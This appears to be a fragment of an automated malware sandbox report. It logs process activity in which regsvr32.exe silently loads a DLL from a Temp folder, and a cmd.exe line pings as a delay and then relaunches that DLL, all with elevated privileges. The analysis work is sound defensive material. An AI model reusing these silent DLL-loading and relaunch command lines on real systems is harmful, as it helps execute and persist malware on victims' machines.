                                                                                                                                                      Imagebase:0x7ff612a90000
                                                                                                                                                      File size:21504 bytes
                                                                                                                                                      MD5 hash:6A7389ECE70FB97BFE9A570DB4ACCC3B
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:moderate

                                                                                                                                                      Analysis Process: regsvr32.exe PID: 6356 Parent PID: 1724

                                                                                                                                                      General

                                                                                                                                                      Start time:15:22:28
                                                                                                                                                      Start date:09/06/2021
                                                                                                                                                      Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll N8DG
                                                                                                                                                      Imagebase:0x7ff62a730000
                                                                                                                                                      File size:24064 bytes
                                                                                                                                                      MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Analysis Process: cmd.exe PID: 6896 Parent PID: 6356

                                                                                                                                                      General

                                                                                                                                                      Start time:15:22:34
                                                                                                                                                      Start date:09/06/2021
                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:cmd /c ping 8.8.7.7 -n 2 & start C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll VE50DB
                                                                                                                                                      Imagebase:0x7ff7180e0000
                                                                                                                                                      File size:273920 bytes
                                                                                                                                                      MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Analysis Process: conhost.exe PID: 5680 Parent PID: 6896

                                                                                                                                                      General

                                                                                                                                                      Start time:15:22:34
                                                                                                                                                      Start date:09/06/2021
                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      Imagebase:0x7ff61de10000
                                                                                                                                                      File size:625664 bytes
                                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                      Analysis Process: PING.EXE PID: 6092 Parent PID: 6896

                                                                                                                                                      General

                                                                                                                                                      Start time:15:22:35
                                                                                                                                                      Start date:09/06/2021
                                                                                                                                                      Path:C:\Windows\System32\PING.EXE
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:ping 8.8.7.7 -n 2
                                                                                                                                                      Imagebase:0x7ff612a90000
                                                                                                                                                      File size:21504 bytes
                                                                                                                                                      MD5 hash:6A7389ECE70FB97BFE9A570DB4ACCC3B
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                      Analysis Process: regsvr32.exe PID: 6872 Parent PID: 3440

                                                                                                                                                      General

                                                                                                                                                      Start time:15:22:43
                                                                                                                                                      Start date:09/06/2021
                                                                                                                                                      Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:'C:\Windows\system32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll VE50DB
                                                                                                                                                      Imagebase:0x7ff62a730000
                                                                                                                                                      File size:24064 bytes
                                                                                                                                                      MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                      Analysis Process: regsvr32.exe PID: 6824 Parent PID: 6896

                                                                                                                                                      General

                                                                                                                                                      Start time:15:22:44
                                                                                                                                                      Start date:09/06/2021
                                                                                                                                                      Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll VE50DB
                                                                                                                                                      Imagebase:0x7ff62a730000
                                                                                                                                                      File size:24064 bytes
                                                                                                                                                      MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                      Analysis Process: regsvr32.exe PID: 400 Parent PID: 3440

                                                                                                                                                      General

                                                                                                                                                      Start time:15:22:51
                                                                                                                                                      Start date:09/06/2021
                                                                                                                                                      Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:'C:\Windows\system32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll VE50DB
                                                                                                                                                      Imagebase:0x7ff62a730000
                                                                                                                                                      File size:24064 bytes
                                                                                                                                                      MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                      Disassembly

                                                                                                                                                      Code Analysis

                                                                                                                                                      Reset < >